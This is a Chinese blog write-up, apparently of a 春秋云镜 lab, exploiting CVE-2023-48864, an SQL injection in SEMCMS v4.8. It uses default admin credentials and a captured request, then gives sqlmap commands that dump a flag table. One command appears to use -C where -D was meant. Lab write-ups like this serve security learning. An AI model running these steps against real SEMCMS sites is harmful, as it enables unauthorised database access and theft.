春秋云镜 CVE-2023-48864

靶标介绍:

SEMCMS是一套支持多种语言的外贸网站内容管理系统(CMS)。SEMCMS v4.8版本存在安全漏洞,该漏洞源于通过 /web_inc.php 中的 languageID 参数发现包含 SQL 注入漏洞。

开启靶场:


开始实验:


1、使用后台扫描工具,发现“安装向导”

2、点击“install”链接,打开安装界面

3、点击“开始安装”,发现连接mysql错误:No such file or directory

4、修改“数据库服务器”为127.0.0.1,点击“开始安装”

返回连接数据库名 mycms 错误: Unknown database 'mycms',

5、修改“数据库名称”为:semcms,开始安装

安装成功

根据安装界面返回信息,得知后台默认帐户:Admin 密码:1

6、点击“点击转到后台”,打开后台登录界面,使用“帐户:Admin 密码:1”登录

登录成功

7、根据提示“该漏洞源于通过 /web_inc.php 中的 languageID  参数包含 SQL 注入”,结合

8、进入“产品管理”-选购一款产品-“批量上架”,使用bp抓包

9、保存抓包文件为55.txt

10、使用sqlmap注入

sqlmap.py -r 55.txt --batch


发现存在AID[]参数存在延时注入

11、查找当前数据库,得到当前数据库为“semcms”

sqlmap.py -r 55.txt --current-db --batch

12、查找semcms数据库的表,找到flllaaaag这个表。

sqlmap.py -r 55.txt -C semcms --tables --batch

13、查找semcms数据库flllaaaag表的字段

sqlmap.py -r 55.txt -D semcms -T flllaaaag --columns --batch

14、爆破flag字段

sqlmap.py -r 55.txt -D semcms -T flllaaaag -C flag --dump

15、获得flag

  • 19
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

QYpiying

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值